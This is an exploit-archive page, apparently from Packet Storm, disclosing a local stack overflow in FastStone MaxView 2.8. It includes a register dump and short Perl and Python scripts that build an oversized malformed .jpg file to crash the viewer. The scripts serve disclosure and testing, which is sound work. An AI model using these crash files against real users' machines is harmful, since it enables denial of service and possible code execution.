FastStone MaxView version 2.8 local stack overflow proof of concept exploit.
72fb1cd5dc6cdd6a17b2ac6a91665e7e247d5d6d7269f84cfc3e0a9b158410b9#######################################################################
# Title : FastStone MaxView 2.8 (.jpg) local Stack Overflow PoC
# Program : FastStone MaxView
# Author : Dr.3v1l
# Date : 2015 01 July
# Website : http://www.faststone.org
# Download : http://www.faststonesoft.net/DN/FSMaxViewSetup28.exe
# Version : 2.8
# Type : (.jpg File) local Stack Overflow PoC
#######################################################################
#
# 01. Vulnerability Information
#
# Class: Buffer overflow [CWE-119]
# Impact: Code execution
# Remotely Exploitable: No
# Locally Exploitable: Yes
# CVE Name: CVE-2014-8386
#
# 02. Technical Description / Proof of Concept Code
#
# This vulnerability is caused by a stack buffer overflow when parsing
# the display properties parameter. A malicious third party could trigger
# execution of arbitrary code within the context of the application, or
# otherwise crash the whole application.
#
# EAX 54A30018 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# ECX 0013D2A8
# EDX 7767D370 ntdll.KiFastSystemCallRet
# EBX 00000000
# ESP 0013D2A8
# EBP 0013D30C
# ESI 0013D328
# EDI 000007A4
# EIP 7767D370 ntdll.KiFastSystemCallRet
# C 0 ES 0023 32bit 0(FFFFFFFF)
# P 1 CS 001B 32bit 0(FFFFFFFF)
# A 0 SS 0023 32bit 0(FFFFFFFF)
# Z 1 DS 0023 32bit 0(FFFFFFFF)
# S 0 FS 003B 32bit 7FFDF000(4000)
# T 0 GS 0000 NULL
# D 0
# O 0 LastErr ERROR_SUCCESS (00000000)
# EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
# ST0 empty -??? FFFF 000000FF 00FF00FF
# ST1 empty 4.7021112344749837450e+18
# ST2 empty 4.7021112344749837450e+18
# ST3 empty 4.7021112344749837450e+18
# ST4 empty 4.7021112344749837450e+18
# ST5 empty 4.7021112344749837450e+18
# ST6 empty 4.7021112344749837450e+18
# ST7 empty 4.7021112344749837450e+18
# 3 2 1 0 E S P U O Z D I
# FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
# FCW 127F Prec NEAR,53 Mask 1 1 1 1 1 1
#
# ---------------------------------------------------------------------
#
# PoC (PERL) :
#
# my $file="3v1l.jpg";
# open(my $FILE, ">>$file") or die "Cannot open $file: $!";
# print $FILE "\x41" x 250000000;
# close($FILE);
# print "$file has been created \n";
#
#
# PoC (PYTHON) :
#
# file="3v1l.jpg"
# junk="\x41"*250000000
# writeFile = open (file, "w")
# writeFile.write(junk)
# writeFile.close()
#
#######################################################################
#
# [+] Contact Me :
#
# B.Devils.B@gmail.com
# Twitter.com/Doctor_3v1l
# Twitter.com/blackdevilsb0ys
# Facebook.com/blackdevilsb0ys
# Linkedin.com/in/hossein3v1l
# Hossein Hezami - Black_Devils B0ys
#
#######################################################################
# Black_Devils B0ys - blackdevilsb0ys.ir
#######################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed